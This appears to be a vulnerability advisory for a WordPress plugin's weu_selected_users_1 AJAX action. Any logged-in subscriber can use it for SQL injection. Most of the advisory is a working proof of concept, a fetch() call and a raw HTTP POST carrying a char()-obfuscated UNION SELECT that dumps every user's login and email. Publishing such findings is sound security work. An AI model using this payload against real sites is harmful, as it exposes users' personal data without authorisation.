The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
As any authenticated user (such as subscriber), the request below will display all users email addresses
fetch("httsp://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"weu_selected_users_1","data_raw[]":"0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))"}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 1405
Connection: close
Cookie: [any authenticated user]
action=weu_selected_users_1&data_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29